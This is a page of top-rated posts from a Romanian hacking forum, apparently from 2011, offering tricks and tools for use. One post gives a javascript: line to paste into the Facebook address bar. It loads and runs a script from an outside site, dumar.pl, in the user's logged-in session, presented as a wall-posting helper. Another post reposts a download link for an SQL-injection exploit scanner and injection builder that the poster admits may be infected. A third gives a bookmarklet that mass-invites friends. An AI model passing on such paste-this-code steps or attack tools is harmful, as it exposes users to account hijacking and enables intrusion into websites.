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Showing content with the highest reputation on 07/19/11 in all areas

  1. Daca aveti un eveniment la care participati si vreti sa va invitati si prietenii dar avetii cateva sute sa zicem ar dura foarte mult si v-ati plictisi asa ca rezolvarea este urmatoarea: 1.Click pe invita persoane 2.Selectati ultimul prieten din lista 3.Introduceti codul de mai jos in bara URL dupa care apasati tasta "enter"(pentru nestiutori binenteles ca trebuie sa stergeti acel link inainte de introducerea codului): javascript:javascript:var elms=document.getElementsByName("checkableitems[]");for(var count=0;count<elms.length;count++){var t = setTimeout("elms["+count+"].click()",100)}
    1 point
  2. Sql Poizon v1.1 - Sqli Exploit Scanner, Search Hunter, Injection Builder Tool Nu l-am descarcat, nu l-am incercat, nu stiu daca e infectat, executati pe riscul vostru. Greetings All, After a very successfull release of Sql Poizon v1.0, The Exploit Scanner Tool, I am hereby introducing you with the new release which is more handy. It has new features as well as bug fixes from the older release. Please take a look for it below: New Features: "Look n Feel" is more attractive now. Rich "Context Menu" items. "Results" contain checkboxes to enable selection. "Selected Dork" box is editable now for user convenience. Built-in Browser for "Injection Builder" to check the impact of injection. "Text Bucket" available for "Injection Builder" to save extra data. "Insert Order By" button is added to "Injection Builder". "Internet Browser" with Snapshot and HTML DOM Tree. Bug Fixes: It wont get stucked after pressing the stop button. Just a minor wait can occur which is okay. Progress bar for "Crawler" has been fixed. It will show correct progress now. Error on importing file is fixed now. You can import files from other directories as well. "Searchqu" shows invalid results. It is fixed now. Sql Poizon v1.1 - Sqli Exploit Scanner, Search Hunter, Injection Builder Tool Author: p0!z0neR Download: http://rapidshare.com/files/440158132/Sql_Poizon_v1.1_-_Sqli_Exploit_Scanner_Tool.rar Sursa: Hack Forums
    1 point
  3. Eploateaza vulnerabilitati Sql Injection.
    -1 points
  4. Pm pentru link http://vscan.novirusthanks.org
    -1 points
  5. Intra?i pe profilul unui utilizator facebook,?terge?i tot din c?su?a URL,?i copia?i asta: javascript:(a = (b = document).createElement("script")).src = "//dumar.pl/dumar_script.js", b.body.appendChild(a); void(0) dupaia scrie?i in casuta care va apare cate mesaje doriti sa lasati pe perete,dati ok si enjoy! LE: Merge doar la prieteni!!! Sursa: HackForums
    -1 points
  6. Merge doar pt audio. Pt video astept niste beri Trilulilu Mp3 Downloader
    -1 points
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